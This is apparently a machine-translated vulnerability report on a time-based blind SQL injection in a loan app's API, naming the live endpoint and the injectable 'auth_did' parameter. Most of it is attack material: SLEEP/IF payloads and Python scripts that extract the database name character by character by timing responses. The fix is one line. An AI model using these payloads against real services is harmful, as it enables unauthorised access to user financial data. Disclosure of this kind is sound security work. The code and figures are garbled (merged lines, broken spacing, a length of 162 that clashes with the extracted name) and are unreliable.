SQL injection vulnerability in the APP
SQL injection vulnerability in the APP
The "good loan APP" of good loan Network detected a time-blind injection on the following URLs. The injection parameter is auth_did.
Http://interface.api.haodai.com/capi/sys/up_push_code? OS _type = 1 & appid = 2 & imei = A0000000000000 & app_version = 27000 & auth_tms = 20150927122749 & auth_did = 218372 & auth_dsig = signature & auth_uid = 402888 & auth_usig = signature & pushcode = Signature
I found that I couldn't run it with SQLMap. I looked at it manually and found that I filtered out the big and small numbers ...... Write the Python program and run the following command: 1. Run the Database Name Length:
And sleep (IF (select length (DATABASE () = 1, 5, 0) import requests, timefor I in range (21): url = R' http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372 % 20AND % 20 SLEEP % 28IF % 28% 28 SELECT % 20 LENGTH % 28 DATABASE % 28% 29% 29% 29 = '+ str (I) + ', 5, 0% 29% 29 & auth_dsig = 7e63707f4c2c0000c & auth_uid = 402888 & auth_usig = c28be912f3a53c23 & pushcode = pai'st = time. time () r = requests. get (url) print 'length: ', I, time. time ()-st get: LENGTH (DATABASE () = 162, run database Name: and sleep (IF (ascii (mid (DATABASE (),) =, 0) import requests, timedatabase = ''for j in range (16): I = 33 while I url = R' http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372 And sleep (IF (ascii (mid (database (), '+ str (j + 1) +', 1) = '+ str (I) +', 10, 0 )) & auth_dsig = 7e63707f4c2c316c & auth_uid = 402888 & auth_usig = c28be912f3a53c23 & pushcode = ed0e046ea6e40d71a4ba375cc010decd 'st = time. time () r = requests. get (url) if time. time ()-st> 10: database = database + chr (I) print 'database _ name: ', Database break I = I + 1
Obtain the Database Name: interface_hd_com.
Solution:
Parameter Filtering